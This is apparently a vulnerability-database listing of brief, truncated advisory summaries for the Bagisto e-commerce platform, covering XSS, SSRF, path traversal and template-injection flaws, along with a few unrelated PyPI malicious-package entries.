CVE-2026-9506

This vulnerability exists in Bagisto due to improper validation of user-supplied input in the ImageCacheController component. An unauthenticated remote attacker could exploit this vulnerability by sending crafted path traversal sequences through the filename parameter to access arbitrary files...

CVE-2026-6745

A vulnerability was determined in Bagisto up to 2.3.15. Affected by this vulnerability is an unknown functionality of the component Custom Scripts Handler. This manipulation causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may...

CVE-2026-6744

A vulnerability was found in Bagisto up to 2.3.15. Affected is the function copy of the component Downloadable Link Handler. The manipulation results in server-side request forgery. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted...

PT-2026-34047

Name of the Vulnerable Software and Affected Versions Bagisto versions prior to 2.3.16 Description An issue exists in the Custom Scripts Handler component that allows for cross site scripting. This flaw enables remote exploitation through the manipulation of an unknown functionality within the...

CVE-2019-16403

In Webkul Bagisto before 0.1.5, the functionalities for customers to change their own values such as address, review, orders, etc. can also be manipulated by other customers...

CVE-2026-21450

Bagisto is an open source laravel eCommerce platform. Versions prior to 2.3.10 are vulnerable to server-side template injection via type parameter, which can lead to remote code execution or another exploitation. Version 2.3.10 fixes the issue...

Bagisto SSTI vulnerability in type parameter can lead to RCE

Summary SSTI is possible in Bagisto via type parameter can lead to RCE and other exploitations. Details 1. Go to http://127.0.0.1:8000/admin/reporting/products/view?type=77 Impact Can lead to RCE, command injection...

Cross-site Scripting (XSS)

Bagisto is vulnerable to Cross-site Scripting XSS. The vulnerability is due to insufficient validation of uploaded files in the TinyMCE image upload functionality, which allows an attacker with sufficient privileges to upload a crafted HTML file containing JavaScript that executes in a user’s...

Webkul Software Bagisto 安全漏洞

Webkul Software Bagisto is an open source e-commerce framework from Webkul Software, India. A security vulnerability exists in Webkul Software Bagisto versions prior to 2.3.8, which stems from incorrect handling of spreadsheet formula characters and could lead to data exfiltration and remote...

Webkul Software Bagisto 安全漏洞

Webkul Software Bagisto is an open source e-commerce framework from Webkul Software, India. A security vulnerability exists in Webkul Software Bagisto version 2.3.7, which stems from the server-side template engine processing uncleaned user input, and could lead to server-side template injection...

Webkul Software Bagisto 安全漏洞

Webkul Software Bagisto is an open source e-commerce framework from the Indian company Webkul Software. A security vulnerability exists in Webkul Software Bagisto version 2.3.7, which stems from the TinyMCE image upload feature that allows the upload of specially crafted SVG files, which could le...

Bagisto is vulnerable to XSS through Admin Panel's product creation path

An authenticated stored XSS vulnerability exists in the Bagisto 2.3.6 admin panel's product creation path, allowing an attacker to upload a crafted SVG file containing malicious JavaScript code. This vulnerability can be exploited by an authenticated admin user to execute arbitrary JavaScript in...

CVE-2025-56426

An issue WebKul Bagisto v.2.3.6 allows a remote attacker to execute arbitrary code via the Cart/Checkout API endpoint, specifically, the price calculation logic fails to validate quantity inputs properly...

EUVD-2024-0328

Malicious code in bioql PyPI...

EUVD-2023-37726

Malicious code in bioql PyPI...

EUVD-2025-17448

Malicious code in bioql PyPI...

CVE-2025-40675

A Reflected Cross-Site Scripting XSS vulnerability has been found in Bagisto v2.0.0. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending the victim a malicious URL using the parameter 'query' in '/search'. This vulnerability can be exploited to stea...

CVE-2023-36236

Cross Site Scripting vulnerability in webkil Bagisto v.1.5.0 and before allows an attacker to execute arbitrary code via a crafted SVG file uplad...

CVE-2023-36237

Cross Site Request Forgery vulnerability in Bagisto before v.1.5.1 allows an attacker to execute arbitrary code via a crafted HTML script...

CVE-2023-33570

Bagisto v1.5.1 is vulnerable to Server-Side Template Injection SSTI...